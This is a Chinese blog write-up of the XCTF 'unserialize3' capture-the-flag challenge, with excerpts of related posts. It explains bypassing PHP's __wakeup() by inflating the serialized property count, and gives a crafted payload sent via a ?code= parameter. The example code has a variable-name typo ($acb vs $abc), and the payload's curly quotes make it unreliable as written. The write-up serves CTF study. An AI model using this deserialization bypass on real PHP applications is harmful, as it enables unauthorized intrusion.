攻防世界复习web进阶(3)

最新推荐文章于 2023-09-05 23:32:57 发布
最新推荐文章于 2023-09-05 23:32:57 发布
阅读量221 收藏 1
点赞数
分类专栏: 攻防世界web复习 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LGXJM20/article/details/109462124
版权

unserialize3解题思路
描述:无
思路:打开页面是一段代码,代码审计走起,最重要的是这一个函数function __wakeup(),配合题目unserialize想到PHP的序列化和反序列化
在这里插入图片描述php反序列化:执行unserialize()时,先会调用__wakeup(),当序列化字符串中属性值个数大于属性个数,就会导致反序列化异常,从而跳过__wakeup()。
解题方法:

<?php
class xctf{                      
public $flag = '111';            
public function __wakeup(){   
exit('bad requests');
}
}
$acb = new xctf(); //new实例化xctf对象为abc         
echo(serialize($abc)); //输出被序列化的对象abc
?>

正常执行序列化的结果为O:4:“xctf”:1:{s:4:“flag”;s:3:“111”;}
将xctf类的属性值修改触发反序列化异常跳过__wakeup(),将值传入code得到flag,所以将O:4:“xctf”:1:{s:4:“flag”;s:3:“111”;}修改为O:4:“xctf”:2:{s:4:“flag”;s:3:“111”;}
将参数传入code:
http://220.249.52.133:45480?code=O:4:“xctf”:2:{s:4:“flag”;s:3:“111”;}
得到flag
在这里插入图片描述

0x333
关注
专栏目录
攻防世界Web 高手进阶区 supersqli (菜鸡蛋版本)
m0_52513952的博客
02-24 349
从进入高手进阶区开始,就越发觉得自己会的东西好少,php之前没学过,导致我压根看不懂之前那些需要读懂php源码才能拿到flag的题,于是我一跳再跳,终于看到了亲切而熟悉的“sql”,一道sql注入题,应该有机会能自己拿到flag了!!然而。。。
攻防世界———MISC 高手区题解
热门推荐
小锤队长的博客
10-14 1万+
目录 1,base64stego 2,easycap 3,Avatar 4,What-is-this 5,签到题 6,Training-Stegano-1 7,Excaliflag 8,Get-the-key.txt 9,glance-50 10,4-2 11,misc1 12,embarrass 13,肥宅快乐题 14,小小的PDF 至此 我在攻防世界中已经 遇到...
学习笔记 | PHP反序列化漏洞
m0_57133419的博客
08-11 280
其中wakeup()函数漏洞原理是类对象属性个数超过实际个数,也就是其中的类名称后面跟的数字就是属性,修改为2时,不执行wakeup函数。就不会输出bad request,如果用没修改过的序列化语句就会输出bad request。看到wakeup函数,先构造序列化语句输出。攻防世界unserialize3。
ctf每日练习-第一天
想变得强大,虽然现在还弱不禁风
08-28 557
unserialize3(来自xctf web进阶区) unserialize3题目链接 class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 原理: PHP反序列化漏洞:执行unserialize()时,先会调用__wakeup()。 当序列化字符串中属性值个数大于属性个数,就会导致反序列化异常,从而跳过__wakeup()。 本题_wakeup会执行exit(),所以要绕
攻防世界-web-高手进阶区-unserialize3
wyj_1216 House
07-10 926
题目 writeup class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } 分析上述代码,发现:_wakeup() 考虑反序列化 <?php class xctf{ public $flag = '111'; public function __wakeup(){ exi...
xctf攻防世界 Web高手进阶区 unserialize3
l8947943的博客
07-24 9307
深度剖析PHP序列化和反序列化
反序列化(下)
qq_62046696的博客
05-26 219
目录 unserialize3(攻防世界进阶) class xctf{ #定义一个以xctf为名的类 public $flag = '111'; #给xctf类定义一个$falg,并且赋值为111 public function __wakeup(){ #定义__wakeup()构造方法,#在对象反序列化的时候触发 exit('bad requests'); 退出,肯定是绕过wakeup这种方法 } ?code=
WEB安全零基础入门到进阶教程
Ms08067安全实验室
11-10 3085
关注我们公众号的粉丝很多都是我的读者,或多或少看过《WEB安全攻防:渗透测试实战指南》一书。如果你已经完成了该书的阅读、进行过书中实验的实操,相信WEB安全渗透与防御已经初窥门径。如...
西普WEB大部分题解
12-09
【描述】提到的"需要在西普刷题的CTF小伙伴赶紧下载吧",意味着这个压缩包文件是为准备参加CTF竞赛的学员量身定制的,他们可以通过这些题解来复习、预习或解决他们在西普平台上遇到的难题。CTF比赛通常涉及到网络...
数据包分析进阶教程:用Wireshark深入Kali Linux
在深入研究数据包分析的世界之前,我们必须掌握一些基础概念。数据包分析是指捕获并检查通过网络传输的数据包,目的是为了监控和诊断网络问题,以及为了安全分析而识别恶意活动或违规行为。数据包是网络通信中的基本...
CTF_Web攻防世界高手区进阶题WP(9-14)
AFCC_的博客(Web_Dog)
08-08 3126
持续更新ing 0x09 PHP2 题目只有一句话,Can you anthenticate to this website?,其实说实话没什么思路,根据dirsearch的结果,只有index.php存在,里面也什么都没有,各路前辈说index.phps存在源码泄露,于是看了看。 <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode
反序列化中_wakeup的绕过
最新发布
rev1ve的博客
09-05 2062
反序列化中_wakeup扮演着非常重要的角色,ctf碰到很多的题目都有涉及到_wakeup绕过,写下这篇博客来总结下大部分绕过方法,其中会有例题具体演示。
攻防世界--unserialize3 fileinclude
tzyyyyyy的博客
02-06 698
攻防世界--unserialize3 fileinclude
攻防世界-unserialize3_魔术函数,以及wakeup()函数的绕过
Fisher
05-15 1375
拿到题目得到一段代码: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 根据提提示是序列化,将xctf类进行序列化,之后如果执行__wakeup()则会跳出, 所以需要构造函数绕过 __wakeup() 经常用在反序列化操作中,例如重新建立数据库连接,或执行其它初始化操作 所以是将序列化的值反序列化之后执行,因此我们构造序列化的值 先将类进行序列化: <?php
浅谈PHP反序列化漏洞
Atkx's Blog
10-18 525
PHP序列化 序列化是将变量转换为可保存或传输的字符串的过程。 先建一个Test对象,存入信息,然后new了一个实例$m的时候,将Test对象的一些信息给改变了。 如果还要用到这个实例,那就要把他序列化存起来,方便以后重用。 <?php class Test { public $id=1; public $name ="admin"; public $password="admins"; } $m=new Test(); $m->id=2; $m->name="root"
php序列化相关
weixin_45904256的博客
09-29 1832
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
PHP反序列化练习册
qwsn
11-19 2639
1、XCTF平台:https://adworld.xctf.org.cn/task 高阶:1.unserialize3 高阶:2.Web_php_unserialize 2、BUUCTF平台:https://buuoj.cn/challenges Web类:4.[安洵杯 2019]easy_serialize_php Web类:5.[ZJCTF 2019]NiZhuanSiWei Basic类:6.BUU CODE REVIEW 1 Web类:7.[网鼎杯 2020 青龙组]AreUSerialz Web
PHP反序列化-unserialize3(攻防世界
Curry197的博客
05-31 646
题目: class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code= 解题思路: wakeup()函数是在对象被反序列化之后被调用 但是这题如果这个函数被调用,那么程序就退出了,所以需要想办法绕过这个函数。 绕过wakeup函数执行 wakeup()有个执行漏洞:一个字符串或对象被序列化后,如果其属性被修改,则不会执行wakeup()函数,这算是一个绕过点 只要序
攻防世界XCTF:unserialize3
末初的CSDN博客
03-08 721
首先了解一下一些魔术方法 __construct(), __destruct(), __call(), __callStatic(), __get(), __set(), __isset(), __unset(), __sleep(), __wakeup(), __toString(), __invoke(), __set_state(), __clone() 和 __debugInfo() 等...
攻防世界web新手题unserialize3
05-05
s:3:"age";s:1:"0";}s:4:"data";s:45:"flag{3c75f8e2-6eb1-4f50-8901-8c3e0ae63a07}";} ``` 最后将序列化后的字符串作为 $_GET['a'] 的值传入即可,访问 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值